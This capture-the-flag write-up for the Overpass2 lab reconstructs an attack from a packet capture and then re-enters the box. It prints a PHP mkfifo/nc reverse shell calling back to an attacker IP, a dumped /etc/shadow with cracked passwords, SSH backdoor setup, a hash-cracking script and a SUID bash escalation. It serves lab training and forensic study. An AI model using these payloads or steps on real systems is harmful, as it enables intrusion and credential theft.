# OverPass2

###### tags: `vulnerableMachine` `investigation`

[TOC]

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. Can you work out how the attacker got in, and hack your way back into Overpass' production server?

---

Attacker: 192.168.170.145
Victim: 192.168.170.159

# Protocol Hierarchy Statistics

![](https://i.imgur.com/EJLWYXN.png)

# Export HTTP packets

![](https://i.imgur.com/pud1Fim.png)

# Upload the web shell

The exported HTTP traffic contains a multipart `POST` to the development upload form. The `fileToUpload` part carries `payload.php`, a one-line PHP reverse shell:

```
-----------------------------1809049028579987031515260006
Content-Disposition: form-data; name="fileToUpload"; filename="payload.php"
Content-Type: application/x-php

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
-----------------------------1809049028579987031515260006
Content-Disposition: form-data; name="submit"

Upload File
-----------------------------1809049028579987031515260006--
```

payload.php (99 bytes, the file that later shows up in the uploads directory):

```
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
```

Requesting the uploaded file makes the web server execute it as `www-data`: the script creates a named pipe and wires `/bin/sh` to a netcat connection back to the attacker on 192.168.170.145:4242 (the classic mkfifo/nc reverse shell).

Attacker -> Initial Access

---

Reading the shell session in Wireshark: select a packet of the stream, expand the TCP segment data, then Copy -> ...as Printable Text. `tcp.port == 80` isolates the upload itself; the interactive commands travel over the reverse connection to 192.168.170.145:4242 that the payload opens, so follow that stream to see what was typed.

```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# the shell runs as www-data (uid 33), the web server account
www-data@overpass-production:/var/www/html/development/uploads$
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$
```

# Stabilize the shell

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

-> upgrades the raw netcat shell to an interactive pseudo-terminal

The attacker then dumped the password hashes. This needs `sudo`, so by this point the session was no longer plain `www-data`; the prompts in the persistence section show it running as `james`.

```
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
```

# John crack

![](https://i.imgur.com/wsDNmve.png)

The five `$6$` (sha512crypt) hashes run through john with rockyou; four fall:

```
secret12  (bee)
abcd123   (szymex)
1qaz2wsx  (muirland)
secuirty3 (paradox)
```

# Persistence

```
git clone https://github.com/NinjaJc01/ssh-backdoor
```

The attacker cloned an SSH backdoor written in Go and started it listening on port 2222, passing his own password hash on the command line:

```
Cloning into 'ssh-backdoor'...
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ chmod +x backdoor
./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
```

# Analysis of the backdoor program

https://github.com/NinjaJc01/ssh-backdoor/blob/master/main.go

![](https://i.imgur.com/J5BZxpT.png)

hash type: SHA-512 (a plain digest over password + salt, not sha512crypt)
protocol: SSH (the program runs its own SSH server and accepts any user whose password matches the hash)

Password check:

```
func verifyPass(hash, salt, password string) bool {
	resultHash := hashPassword(password, salt)
	return resultHash == hash
}
```

-> `hashPassword(password, salt)` is recomputed for every login attempt and compared against the stored hash, so to log in we need the salt and a password that hashes to the captured value

```
func passwordHandler(_ ssh.Context, password string) bool {
	return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password)
}
```

The salt is hard-coded:

```
1c362db832f3f864c8c2fe05f2002a05
```

Default hash (used when `-a` is not given):

```
var hash string = "bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3"
```

The attacker overrode it with `-a`, and that hash is in the pcap:

```
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
```

# Hack back

## Crack (hash+salt)

john's dynamic format `sha512($p.$s)` is exactly what the Go code computes (SHA-512 over the password followed by the salt); the input file holds one `hash$salt` line:

```
john --wordlist=../../wordlists/rockyou.txt --format='dynamic=sha512($p.$s)' hackerHash.txt
```

backdoor (port 2222) password: november16

---

Hash+Salt (contents of hackerHash.txt)

```
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed$1c362db832f3f864c8c2fe05f2002a05
```

![](https://i.imgur.com/KE45SME.png)

![](https://i.imgur.com/27pVfh7.png)

## SSH login

https://blog.alanwei.com/blog/2022/01/24/ssh-no-matching-host-key-type-found/

OpenSSH clients from 8.8 onwards disable the SHA-1 based `ssh-rsa` signature algorithm by default, and the backdoor's server only offers `ssh-rsa`, hence the "no matching host key type found" error. Re-enable it for this one connection (10.10.214.245 is the live target; the victim in the capture was 192.168.170.159):

```
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa james@10.10.214.245 -p 2222
```

![](https://i.imgur.com/2hYpXXL.png)

Hunt for SUID/SGID binaries (the original second command had `-o-` typos; `-o` is find's OR and the group needs escaped parentheses):

```
find / -perm -u=s -type f 2>/dev/null
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null   # SUID or SGID; a file with both bits matches too
```

![](https://i.imgur.com/4iDAauo.png)

```
./.suid_bash -p
```

`-p` (privileged mode): when bash starts with an effective UID that differs from the real UID it normally resets the effective UID to the real one, so a SUID-root copy of bash silently drops root unless it is started with `-p`. With the flag the shell keeps euid 0.
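The crack above can be reproduced without john. The following is an added example written for these notes, not code from the write-up or from ssh-backdoor: it mirrors `hashPassword`/`verifyPass` in Python, emits the `hash$salt` line john expects, and runs a dictionary attack on the captured hash. The five-word wordlist is constructed in place to stand in for rockyou.txt.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Salt hard-coded in ssh-backdoor's main.go (quoted in the analysis section above).
SALT = "1c362db832f3f864c8c2fe05f2002a05"

# Hash the attacker passed to ./backdoor -a, recovered from the pcap.
CAPTURED_HASH = (
    "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3"
    "e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed"
)

# Constructed stand-in for rockyou.txt so the script runs offline.
WORDLIST = ["password", "overpass", "secret12", "november16", "letmein"]


def hash_password(password: str, salt: str) -> str:
    """Python equivalent of hashPassword() in main.go: hex(SHA-512(password || salt))."""
    return hashlib.sha512((password + salt).encode()).hexdigest()


def verify_pass(stored_hash: str, salt: str, password: str) -> bool:
    """Python equivalent of verifyPass(). The Go code compares with ==;
    compare_digest is used here so the check itself does not leak timing."""
    return hmac.compare_digest(hash_password(password, salt), stored_hash)


def john_line(stored_hash: str, salt: str) -> str:
    """Input line for john --format='dynamic=sha512($p.$s)': hash$salt."""
    return f"{stored_hash}${salt}"


def crack(stored_hash: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate whose salted hash matches, else None."""
    for candidate in candidates:
        candidate = candidate.rstrip("\r\n")  # wordlist files carry line endings
        if verify_pass(stored_hash, salt, candidate):
            return candidate
    return None


if __name__ == "__main__":
    print(john_line(CAPTURED_HASH, SALT))
    print("backdoor password:", crack(CAPTURED_HASH, SALT, WORDLIST))
```

Because the salt is a compile-time constant shared by every deployment of this backdoor, cracking one captured hash is no harder than cracking an unsalted SHA-512: a single rockyou pass, or a precomputed table, covers all of them.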
![](https://i.imgur.com/DB74Pq4.png)
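Going back to the initial access: the upload quoted at the top of these notes can be pulled out of the HTTP export programmatically rather than by eye. This is an added example, not code from the write-up. It reconstructs the captured multipart body inline (the `boundary` value in the Content-Type header is assumed to be the delimiter line minus its leading two dashes, since the notes do not quote that header), extracts every file-carrying part with the standard library email parser, flags reverse-shell indicators, and recovers the callback host and port.

```python
import email
import re
from typing import Dict, List, Optional, Tuple

# Assumed Content-Type boundary: the delimiter line from the capture without its
# leading "--" (the header itself is not quoted in the notes).
BOUNDARY = "---------------------------1809049028579987031515260006"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"

# The uploaded file exactly as captured.
PHP_PAYLOAD = (
    b'<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1'
    b'|nc 192.168.170.145 4242 >/tmp/f")?>'
)


def build_body(boundary: str, parts: List[Tuple[bytes, bytes]]) -> bytes:
    """Assemble a multipart/form-data body with CRLF line endings; used only to
    reconstruct the captured request so the script runs offline."""
    delim = b"--" + boundary.encode()
    body = b""
    for headers, content in parts:
        body += delim + b"\r\n" + headers + b"\r\n\r\n" + content + b"\r\n"
    return body + delim + b"--\r\n"


# Constructed from the POST quoted in the "Upload the web shell" section.
CAPTURED_BODY = build_body(BOUNDARY, [
    (b'Content-Disposition: form-data; name="fileToUpload"; filename="payload.php"\r\n'
     b"Content-Type: application/x-php", PHP_PAYLOAD),
    (b'Content-Disposition: form-data; name="submit"', b"Upload File"),
])

# Things a benign document upload has no business containing.
INDICATORS = {
    "php-tag": rb"<\?php",
    "exec": rb"\bexec\s*\(",
    "system": rb"\bsystem\s*\(",
    "mkfifo": rb"\bmkfifo\b",
    "netcat": rb"\bnc\b",
    "shell": rb"/bin/sh",
}


def extract_uploads(content_type: str, body: bytes) -> List[Dict]:
    """Parse a multipart/form-data body and return one record per file part."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    uploads = []
    for part in msg.get_payload():
        filename = part.get_filename()
        if not filename:
            continue  # ordinary form fields (submit=Upload File) are not files
        data = part.get_payload(decode=True) or b""
        uploads.append({
            "field": part.get_param("name", header="content-disposition"),
            "filename": filename,
            "content_type": part.get_content_type(),
            "size": len(data),
            "indicators": [name for name, pat in INDICATORS.items() if re.search(pat, data)],
            "content": data,
        })
    return uploads


def reverse_shell_target(data: bytes) -> Optional[Tuple[str, int]]:
    """Pull host and port out of an 'nc HOST PORT' call, if the file contains one."""
    m = re.search(rb"\bnc\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b", data)
    if not m:
        return None
    return m.group(1).decode(), int(m.group(2))


if __name__ == "__main__":
    for up in extract_uploads(CONTENT_TYPE, CAPTURED_BODY):
        print(up["filename"], up["size"], up["indicators"], reverse_shell_target(up["content"]))
```

On a real export, feed the body of the POST (File -> Export Objects -> HTTP, or the reassembled stream) and its Content-Type header to `extract_uploads`; the record for `payload.php` is what would go into the timeline, and the host:port pair is the filter to apply next in Wireshark to find the shell session.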